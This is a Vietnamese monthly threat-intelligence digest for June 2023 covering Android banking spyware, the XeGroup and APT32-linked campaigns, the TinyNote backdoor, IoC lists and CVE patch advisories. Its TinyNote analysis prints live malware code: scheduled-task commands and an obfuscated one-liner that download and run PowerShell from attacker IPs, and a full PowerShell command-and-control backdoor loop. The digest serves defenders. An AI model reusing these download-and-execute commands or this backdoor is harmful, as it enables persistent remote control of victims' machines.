THÔNG TIN CÁC MỐI ĐE DỌA BẢO MẬT THÁNG 06 – 2023

Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài viết

1        Các mối đe dọa nâng cao – Advanced Threats

1.1      Chiến dịch tấn công nhắm đến người dùng ngân hàng ở Việt Nam sử dụng mẫu mã độc Android mới HelloTeacher

Đội ngũ Cyble Research & Intelligence Labs (CRIL) đã phát hiện 1 mẫu Android Spyware mới nhắm đến các người dùng ngân hàng ở Việt Nam. Mẫu malware này được đặt tên “HelloTeacher” dựa trên test service có trong mã nguồn của mẫu.

Mã độc HelloTeacher giả dạng thành 1 ứng dụng nhắn tin phổ biến như Viber hay Kik Messenger, nhằm mục đích dễ dàng lừa người dùng cài đặt ứng dụng. Mã độc được trang bị các tính năng để lấy cắp các thông tin từ máy nạn nhân bao gồm danh sách liên lạc, dữ liệu SMS, hình ảnh, danh sách ứng dụng cài đặt, thậm chí chụp hình và ghi lại màn hình thiết bị.

Ngoài ra, nhóm tấn công đứng đằng sau HelloTeacher còn cố gắng sử dụng mã độc như 1 banking trojan thông qua sử dụng 1 Accessibility Service. Các ngân hàng là mục tiêu bị nhắm đến chính của nhóm tấn công bao gồm:

Package name Banking Application name
com.tpb.mb.gprsandroid TPBank Mobile
com.mbmobile MB Bank
com.vietinbank.ipay VietinBank iPay

 

Các chuyên gia phân tích phát hiện trong mã độc có những đoạn code được thiết kế để lấy các thông tin tài khoản từ ứng dụng “TPBank Mobile”. Ngoài ra 1 module khác chưa hoàn thiện nhằm mục đích chèn thêm các giá trị vào trong các trường text trong ứng dụng MB Bank. Việc phát hiện 1 module chưa hoàn thiện chỉ ra rằng mẫu mã độc này vẫn sẽ được phát triển thêm các tính năng mới trong tương lai.

Quá trình phân tích cũng phát hiện 1 số chuỗi strings theo ngôn ngữ tiếng Trung có trong code của mã độc, được sử dụng cho mục đích logging và kết nối C&C.

MITRE ATT&CK

Tactic Technique ID Technique Name
Initial Access T1476 Deliver Malicious App via Other Means.
Initial Access T1444 Masquerade as a Legitimate Application
Collection T1432 Access Contact List
Collection T1412 Capture SMS Messages
Collection T1512 Capture Camera
Collection T1513 Screen Capture
Collection T1533 Data from Local System
Discovery T1418 Application discovery

 

Indicators of Compromise (IoCs)

Indicators Indicator Type Description
00c614ce1a21b1339133240403617e9edc9f2afc9df45bfa7de9def31be0930e SHA256 Hash of analyzed APK
f1e674e58cd60b634febd0be0da38fee7fd40a5c SHA1 Hash of analyzed APK
43162a1c5494d6c84d940beaa7dbd507 MD5 Hash of analyzed APK
hxxp://api[.]sixmiss.com URL C&C server
d0dc26b3485b7e40ec400f681d39767042d30ae50f6f47340adc971cce7fba50 SHA256 Hash of analyzed APK
ba20865f51d46f2bd25a3e6b9f11b26e220ed7ee SHA1 Hash of analyzed APK
b6fa402a0d0fab1dabeb3c90cd8847f9 MD5 Hash of analyzed APK
7c634665f5f2c3b837d7211bf92c095e7e1d6cd3aa4cb86ca75def4146b14ea6 SHA256 Hash of analyzed APK
a8fe89c844699ea2aaba87afd9919907c17ac199 SHA1 Hash of analyzed APK
5b0d2fc2107fd18a0cb125b4997e2d10 MD5 Hash of analyzed APK
hxxp://api[.]viberrx.com URL C&C server

1.2      Phân tích nhóm tấn công XeGroup có nguồn gốc từ Việt Nam

XeGroup là 1 nhóm tấn công được cho là đã hoạt động từ năm 2013, tham gia vào nhiều hoạt động tội phạm mạng khác nhau với các kĩ thuật tấn công khác nhau như:

  • Các cuộc tấn công supply chain, nhằm mục đích inject các bộ quét credit card vào các trang web bị nhóm tấn công
  • Sử dụng các website giả mạo để lừa người dùng cung cấp các thông tin cá nhân
  • Buôn bán dữ liệu trên Dark web

1 báo cáo được cung cấp trước đây bởi Volexity cho thấy nhóm này đã đánh cắp hơn $30 triệu USD từ các tổ chức, tập đoàn của Mỹ, tấn công nhiều website và ứng dụng di động đề chèn thêm các đoạn mã độc hại nhằm đánh cắp dữ liệu thanh toán và thẻ của khách hàng. 1 bản khuyến nghị gần đây từ CISA cho thấy 1 cuộc tấn công của nhóm khai thác lỗ hổng CVE-2019-18935 trên Telerik nhắm đến 1 máy chủ IIS của 1 tổ chức chính phủ của Mỹ.

Đội ngũ Threat Intel của Menlo Labs đã tiến hành phân tích các mẫu tấn công cũng như cơ sở hạ tầng mạng của nhóm và nhận thấy nhóm tấn công khả năng cao có nguồn gốc từ Việt Nam, hoạt động dưới tên “XeThanh” và/hoặc “XeGroup”.

Phân tích file .exe được nhóm sử dụng cho thấy những file này tạo 1 file .aspx tại đường dẫn C:\Windows\Temp và thực thi file để tạo 1 reverse shell kết nối đến XeGroups[.]com.

1 webshell khác cũng được nhóm sử dụng lại có chứa các chuỗi string được hard-coded trong User-Agent. Chuỗi string này được hard-coded dưới dạng base64 encoded, khi giải mã ra là “XeThanh|XeGroups”.

Menlo Labs tiến hành phân tích các hoạt động liên quan đến credit card skimming của nhóm và nhận thấy domain “XeGroups[.]com” cũng được sử dụng trong nameserver.

Tiếp đến, đội ngũ nghiên cứu tiến hành phân tích cơ sở hạ tầng mạng mà nhóm sử dụng, kết hợp với việc thu thập, tổng hợp thông tin từ các nguồn OSINT đã cho thấy 1 cá nhân có tên “Nguyen Huu Tai”, hay các tên khác là “Joe Nguyen”/”Thanh Nguyen” có liên quan đến XeGroup.

Indicators of Compromise (IoCs)

Compromise website

hxxps[://]www.emergencylighting[.]com/

hxxps[://]www.meiersupply[.]com/

hxxps[://]www.onehundred80degrees[.]com/

Testing binary by xethanh

dfab1097f7d345cad468a5e94d03e41701c602898bb9685457f327db3158dfc7

2010 sample

5395ef75d7a6325306f186ec636edc65191e82fd6ca705c58e4355c9498bca4a

2014 sample

02c48917b15015ddd02738bc1f480f9c6379165618435855030f4c63ce372485

ASPXSPY Hashes

Ba2109b5a3ccebbc494ee93880b55640539c7d25b85bc12189f0c671ce473771

884c394c7b3eb757ae57050ac2e6a75385a361555e8e4272de1a3cf24746eec7

Testing network infrastructure

repo.hyperstruct[.]net/mozrepl/1.0/mozrepl.xpi

Threat Actor Infrastructure

184.168.104.171

Skimmer Infrastructure

hivnd[.]com

xegroups[.]com

Xework[.]com

Object[.]fm

paycashs[.]com

xeadult[.]com

1.3      Chiến dịch tấn công các công ty ở Việt Nam sử dụng mẫu mã độc SPECTRALVIPER

Đội ngũ Elastic Security Labs đã theo dõi và phát hiện 1 chiến dịch tấn công nhắm đến các công ty ở Việt Nam trong những tháng vừa qua, được đặt tên là REF2754. Các chuyên gia cũng phát hiện SPECTRALVIPER, 1 mẫu mã độc mới, được sử dụng trong chiến dịch này.

Execution flow

Dấu hiệu tấn công đầu tiên được ghi nhận là việc tạo 1 file mới (C:\Users\Public\Libraries\dbg.config) bởi System service qua SMB từ 1 endpoint đã bị chiếm quyền trong hệ thống. Sau đó, nhóm tấn công thực hiện đổi tên công cụ ProcDump của SysInternals thành Windbg.exe, giả mạo công cụ Windows debugger. Công cụ này sau khi đổi tên được thực thi với flag “-md” nhằm gọi đến dbg.config là 1 DLL chứa các đoạn mã độc.

Dbg.config có chứa DONUTLOADER shellcode nhằm mục đích inject vào tiến trình sessionmsg.exe của Microsoft Remote Session Message Server. DONUTLOADER được cấu hình để tải SPECTRALVIPER backdoor, sau đó là 1 trong 2 họ malware P8LOADER hoặc POWERSEAL.

Đội ngũ Elastic cũng ghi nhận các cuộc tấn công khác với luồng tấn công tương tự, nhưng có sử dụng 1 tiến trình khác (ExtExport.exe) để load file dll, hoặc sử dụng kĩ thuật DLL side-loading sử dụng nslookup.exe để load file dll độc hại (dnsapi.dll).

Quá trình phân tích SPECTRALVIPER cho thấy mẫu này bao gồm các tính năng như proces loading/injection, giả mạo token (token impersonation) và điều khiển file (file manipulation). Mã độc sử dụng các kênh kết nối (HTTP và named pipe) được mã hóa bằng mã hóa AES và Diffie-Hellman hoặc trao đổi key RSA1024. Các mẫu thu được đều được xáo trộn (obfuscated) rất nhiều, sử dụng chung 1 bộ obfuscator với các mức độ hardening khác nhau.

Trong khi đó, P8LOADER là 1 mẫu Windows PE loader cho phép kẻ tấn công giảm thiểu và gây xáo trộn phần logging trên máy nạn nhân, và POWERSEAL là 1 mẫu Powershell runner có các thành phần giúp bypass ETW và AMSI khi sử dụng các công cụ Powershell.

Victimology

1 trong những nạn nhân của REF2754 được Elastic ghi nhận là 1 công ty lớn ở Việt Nam chuyên về kinh doanh nông nghiệp. Sử dụng SPECTRALVIPER Yara signature, các chuyên gia phát hiện thêm các nạn nhân khác cũng là các công ty lớn, hoạt động chủ yếu ở Việt Nam.

Phân tích chiến dịch REF2754 và sự tương đồng với REF4322 cũng được đội ngũ Elastic phát hiện năm 2022, các chuyên gia nghiên cứu nhận thấy các hoạt động tấn công này có mối liên quan đến nhóm APT32 (OCEANLOTUS).

Indicators of Compromise (IoCs)

Observable Type Name Reference
56d2d05988b6c23232b013b38c49b7a9143c6649d81321e542d19ae46f4a4204 SHA-256 SPECTRALVIPER Related to 1.dll below
d1c32176b46ce171dbce46493eb3c5312db134b0a3cfa266071555c704e6cff8 SHA-256 1.dll SPECTRALVIPER
7e35ba39c2c77775b0394712f89679308d1a4577b6e5d0387835ac6c06e556cb SHA-256 asdgb.exe SPECTRALVIPER
4e3a88cf00e0b4718e7317a37297a185ff35003192e5832f5cf3020c4fc45966 SHA-256 Settings.db SPECTRALVIPER
7b5e56443812eed76a94077763c46949d1e49cd7de79cde029f1984e0d970644 SHA-256 Microsoft.MicrosoftEdge_8wekyb3d8bbwe.pkg SPECTRALVIPER
5191fe222010ba7eb589e2ff8771c3a75ea7c7ffc00f0ba3f7d716f12010dd96 SHA-256 UpdateConfig.json SPECTRALVIPER
4775fc861bc2685ff5ca43535ec346495549a69891f2bf45b1fcd85a0c1f57f7 SHA-256 Microsoft.OneDriveUpdatePackage.mca SPECTRALVIPER
2482c7ececb23225e090af08feabc8dec8d23fe993306cb1a1f84142b051b621 SHA-256 ms-certificates.sst SPECTRALVIPER
stablewindowsapp[.]com Domain n/a C2
webmanufacturers[.]com Domain n/a C2
toppaperservices[.]com Domain n/a C2
hosting-wordpress-services[.]com Domain n/a C2
appointmentmedia[.]com Domain n/a C2

 

2        Malware

2.1      Phân tích TinyNote – mã độc sử dụng bởi nhóm tấn công Camaron Dragon

Các nhà nghiên cứu của CheckPoint gần đây công bố bài phân tích mẫu backdoor mới được Camaron Dragon sử dụng có tên TinyNote. Nhóm tấn công Camaro Dragon được cho là liên kết với với mạng lưới gián điệp mạng, các hoạt động của nhóm tấn công được cho là trùng lặp với hoạt động đã được mô tả trong các báo cáo trước liên quan đến các nhóm tấn công được bảo trợ bởi chính phủ Trung Quốc.

Backdoor TinyNote được phát triển bằng ngôn ngữ golang, được phát tán với các tên liên quan đến các vấn đề đối ngoại và có khả năng nhắm mục tiêu vào các đại sứ quán Đông Nam Á và Đông Á. TinyNote là một mã độc dạng remote shell với một số tính năng như thiết lập persistence, thực thi lệnh từ máy chủ C2, bypass phần mềm AV.

Khi bắt đầu thực thi, mã độc bắt đầu với một hàm có tên “bypassSMADAV“. SMADAV là một ứng dụng AV của Indonesia, được dùng nhiều ở người dân Indonesia, một số khác ở các quốc gia Đông Nam Á và Châu Phi. Sau quá trình bypass, mã độc tạo một mutex có tên  “NASA&USA” và tiếp tục thực thi mã độc theo 1 trong 2 chế độ:

Chế độ đầu tiên: thiết lập persistence, mã độc Powershell và cài đặt mã độc

Mã độc sẽ kiểm tra chuỗi “zip” trong đường dẫn, nếu không có chuỗi này mã độc tiếp tục thực thi. TinyNote tạo thư mục tại đường dẫn c:\programdata\Robots, nếu tạo thư mục không thành công, mã độc sẽ không tiếp tục thực thi, có thể là nạn nhân chỉ có các đặc quyền thấp.

Tạo 2 scheduled tasks có tên test và test2 để thực thi các lệnh PowerShell

schtasks /Create /TN test /SC MINUTE /MO 15 /TR "powershell \"$r=[System.Net.WebRequest]::Create(\\\"http://5.188.33.190/Robots.txt\\\");(new-object System.IO.StreamReader(($r.GetResponse()).GetResponseStream())).ReadToEnd() | powershell.exe -noprofile -\"" /f

schtasks /Create /TN test2 /SC MINUTE /MO 45 /TR "powershell \"$r=[System.Net.WebRequest]::Create(\\\"http://103.159.132.91/Robots.txt\\\");(new-object System.IO.StreamReader(($r.GetResponse()).GetResponseStream())).ReadToEnd() | powershell.exe -noprofile -\"" /f

C:\Windows\System32\cmd.exe /c "start powershell.exe -nop -c set-alias exi iex;`$v1='iex (new-object net.webclient).dow';`$v2='nloadstring(''http://';`$v3='103.159.132.91/robots1.txt'')';exi(`$v1+`$v2+`$v3);"

Payload cuối là backdoor Powershell, nhận command từ C2 server, thực thi với  Invoke-Expression, nối output với chuỗi  ‘_n1w_’ và gửi lại kết quả trở lại máy chủ trong POST request

$WindowState = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int stat);';add-type -name win -member $WindowState -namespace native;[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);

$url="http://103.159.132.91:8081/";

$postParams = 'result=start';

while (1 -eq 1) {

try {

    $data = [System.Text.Encoding]::UTF8.GetBytes($postParams);

    $req = [System.Net.WebRequest]::Create($url);

    $req.ServicePoint.ConnectionLimit =65535;

    If ($req.ServicePoint.CurrentConnections -ge 10000) {

        $req.ServicePoint.CloseConnectionGroup("")

    }

    $req.ServicePoint.Expect100Continue = $false;

    #$req.Timeout = 10000;

    $req.Method = "POST";

    $req.ContentType = "application/x-www-form-urlencoded";

    $req.ContentLength = $data.Length;

    $Stream = $req.GetRequestStream();

    $Stream.Write($data, 0, $data.Length);$Stream.Flush();$Stream.Close();

    #waiting remote

    [System.Net.WebResponse] $resp = $req.GetResponse();$header=$resp.GetResponseHeader('CMD');

    $d = [System.Convert]::FromBase64String($header);

    $Ds = [System.Text.Encoding]::UTF8.GetString($d);$result = "";

    Foreach ($string in invoke-expression $Ds){$result=$result+'_n1w_'+$string;};

    $result = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($result));

    $postParams = "result=$result";

}

catch{};

};

Mã độc tự sao chép bản thân vào tệp zip có định dạng “[16 random characters].zip” trong đường dẫn “c:\users\public\” và tạo thêm một bản sao khác tại đường dẫn có định dạng c:\users\public\[16 random characters].zip\. Sau đó, tạo một lập lịch nhằm thực thi bản sao của mã độc từ đường dẫn ngẫu nhiên:

schtasks /Create /TN <random.zip> /SC MINUTE /MO 15 /TR “explorer.exe c:\users\public\<random.zip>\<filename>.exe” /f

Chế độ thứ hai: backdoor

Chế độ này được thực hiện sau khi phần mềm độc hại đã tồn tại trong máy nạn nhân từ lâu và thực thi từ đường dẫn có chuỗi “zip”. Mã độc thực hiện liệt kê thông tin hệ thống theo các thông tin sau và nối thành một chuỗi, các thông tin bao gồm:

  • Tên người dùng hệ thống hiện tại
  • Thư mục của người dùng
  • Thông tin network interfaces (tên, MacAddress, mô tả)

Thực hiện mã hóa chuỗi thông tin trên bằng thuật toán XOR với khóa “NASA” và base64. Gửi GET request tới URL được chọn ngẫu nhiên trong 3 URL sau:

  • http://5.188.33.190/api.php
  • http://103.169.90.132/api.php
  • http://103.159.132.91/api.php

User-agent cũng được chọn ngẫu nhiên từ các user-agent sau:

  • Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
  • Mozilla/5.0 (iPhone; CPU iPhone OS 12_0_1 như Mac OS X) AppleWebKit/605.1.15 (KHTML, như Gecko) Version/12.0 Mobile/15E148 Safari/604.1
  • Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, như Gecko) Chrome/104.0.0.0 Safari/537.36

Máy chủ C2 gửi lại kết quả theo cấu trúc sau: {“msg”:”[BASE64-ENCODED COMMAND]”}

Sau quá trình giải mã reponse từ C2, malware sẽ tạo một Goroutine nhằm thực thi command và tiếp tục lắng nghe các commands khác từ C2.

Indicators of Compromise (IoCs)

f0b081ca58b6c253aa0014847c62dbad

6a2204b32a60aed0a3403c63ad2a529c

5.188.33[.]190

103.169.90[.]132

103.159.132[.]91

23.106.123[.]59

3        CVE và các khuyến nghị bảo mật

3.1      Microsoft Patch Tuesday – June 2023

Trong tháng 6, Microsoft đã phát hành các bản vá cho 69 CVE mới trong các sản phẩm của Microsoft Windows và Windows Components; Office và Office Components; Microsoft Edge (Chromium-based); SharePoint Server; .NET và Visual Studio; Microsoft Teams; Azure DevOps; Microsoft Dynamics; và Remote Desktop Client. Trong đó có 6 lỗ hổng được đánh giá mức độ Nghiêm trọng, 62 lỗ hổng được đánh giá là Important. Dưới đây là các CVE nổi bật:

3.1.1     CVE-2023-32031– Microsoft Exchange Server Remote Code Execution Vulnerability.

CVSS: 8.8/10

Mô tMicrosoft Exchange Server là hệ thống máy chủ mail được sử dụng phổ biến trong các doanh nghiệp/đơn vị. Exchange Server tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa bằng quyền SYSTEM trên hệ thống bị ảnh hưởng. Quá trình khai thác lỗ hổng yêu cầu xác thực.

Phiên bn nh hưởng:

Microsoft Exchange Server 2019 Cumulative Update 13

Microsoft Exchange Server 2016 Cumulative Update 23

Microsoft Exchange Server 2019 Cumulative Update 12

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-32031

3.1.2    CVE-2023-29357 – Microsoft SharePoint Server Elevation of Privilege Vulnerability.

CVSS: 9.8/10

Mô tả:  Microsoft Sharepoint Server tồn tại lỗ hổng cho phép kẻ tấn công leo thang đặc quyền, khai thác thành công lỗ hổng cho phép thực thi câu lệnh bằng quyền administrator. Lỗ hổng này được kết hợp với lỗ hổng có định danh CVE-2023-24955 – RCE tạo thành bugchain

Phiên bản ảnh hưởng:

Microsoft SharePoint Server 2019

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29357.

3.1.3    CVE-2023-29363/32014/32015 – Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability.

CVSS: 9.8/10

Mô tả:  Pragmatic General Multicast (PGM) là một giao thức truyền dữ liệu tin cậy cho phép người nhận phát hiện mất mát dữ liệu, yêu cầu truyền lại dữ liệu khi mất. PGM được triển khai trên môi trường Windows và chỉ hỗ trợ khi Microsoft Message Queuing (MSMQ) phiên bản 3.0 được cài đặt.

Tồn tại lỗ hổng trong PGM cho phép kẻ tấn công không cần xác thực thực thi mã từ xa bằng việc sử dụng file độc hại gửi qua mạng trên môi trường Pragmatic General Multicast (PGM) Server chạy dịch vụ Microsoft Message Queuing (MSMQ)

Phiên bản ảnh hưởng:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows 10 Version 22H2 for 32-bit Systems

Windows 10 Version 22H2 for ARM64-based Systems

Windows 10 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for ARM64-based Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 version 21H2 for ARM64-based Systems

Windows 11 version 21H2 for x64-based Systems

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29363 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-32014 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-32015

3.2      Ứng Dụng Web Và Các Sản Phẩm Khác

3.2.1    CVE-2023-34362 – MOVEit Transfer SQL Injection / Remote Code Execution.

CVSS: 9.8/10

Mô tả:  Tồn tại lỗ hổng SQL Injection trong ứng dụng web MOVEit Transfer cho phép kẻ tấn công không cần xác thực có quyền truy cập vào cơ sở dữ liệu của MOVEit Transfer, từ đó thực thi các câu lệnh SQL làm thay đổi, thêm, sửa, xóa cơ sở dữ liệu

Phiên bản ảnh hưởng:

Progress MOVEit Transfer trước phiên bản 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), và 2023.0.1 (15.0.1)

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023

3.2.2   CVE-2023-27997 – FortiOS & FortiProxy – Heap buffer overflow in sslvpn pre-authentication.

CVSS: 9.2/10

Mô tả:  Tồn tại lỗ hổng tràn bộ đệm trên heap (heap-based buffer overflow) cho phép kẻ tấn công thực thi mã từ xa.

Phiên bản ảnh hưởng:

FortiOS-6K7K version 7.0.10

FortiOS-6K7K version 7.0.5

FortiOS-6K7K version 6.4.12

FortiOS-6K7K version 6.4.10

FortiOS-6K7K version 6.4.8

FortiOS-6K7K version 6.4.6

FortiOS-6K7K version 6.4.2

FortiOS-6K7K version 6.2.9 through 6.2.13

FortiOS-6K7K version 6.2.6 through 6.2.7

FortiOS-6K7K version 6.2.4

FortiOS-6K7K version 6.0.12 through 6.0.16

FortiOS-6K7K version 6.0.10

FortiProxy version 7.2.0 through 7.2.3

FortiProxy version 7.0.0 through 7.0.9

FortiProxy version 2.0.0 through 2.0.12

FortiProxy 1.2 all versions

FortiProxy 1.1 all versions

FortiOS version 7.2.0 through 7.2.4

FortiOS version 7.0.0 through 7.0.11

FortiOS version 6.4.0 through 6.4.12

FortiOS version 6.2.0 through 6.2.13

FortiOS version 6.0.0 through 6.0.16

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://www.fortiguard.com/psirt/FG-IR-23-097